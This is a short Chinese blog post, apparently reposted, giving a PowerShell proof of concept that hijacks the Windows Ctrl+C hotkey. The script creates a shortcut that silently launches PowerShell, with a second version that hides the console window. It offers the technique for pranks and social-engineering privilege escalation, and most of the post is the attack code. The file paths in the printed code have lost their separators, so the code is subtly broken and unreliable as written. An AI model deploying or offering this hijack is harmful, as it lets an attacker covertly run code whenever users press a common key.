用Powershell劫持Windows系统快捷键；含POC

方法非常简单，短短7行powershell创建快捷方式的代码就可以轻松搞定。

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("desktopdesktoppayload.lnk")
$Shortcut.TargetPath = "%SystemRoot%system32WindowsPowerShellv1.0powershell.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"
$Shortcut.hotkey = "ctrl+c"
$Shortcut.Arguments = 'calc'
$Shortcut.Save()

代码链接：https://gist.githubusercontent.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6/raw/c898394b412a2b2f149cabec94aa08f8a519b0b7/calc.ps1

看一下效果：

动图用Powershell劫持Windows系统快捷键；含POC

美中不足的是，上面的7行代码在按下快捷方式的时候，会先闪出一个黑框。那，不要让他弹出黑框怎么做到捏？

就加一行，让其最小化执行。

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("desktopdesktoppayload.lnk")
$Shortcut.TargetPath = "%SystemRoot%system32WindowsPowerShellv1.0powershell.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"
$Shortcut.hotkey = "ctrl+c"

$Shortcut.WindowStyle = '7' 

$Shortcut.Arguments = 'calc'
$Shortcut.Save()

劫持快捷键有很多利用的场景，恶搞也行，社工提权也可以做到。

本文来源于互联网:用Powershell劫持Windows系统快捷键；含POC

shadowsec

用Powershell劫持Windows系统快捷键；含POC

免杀基础–内存执行ProcessHerpaderping技术

欢迎访问（暗影安全）资源池子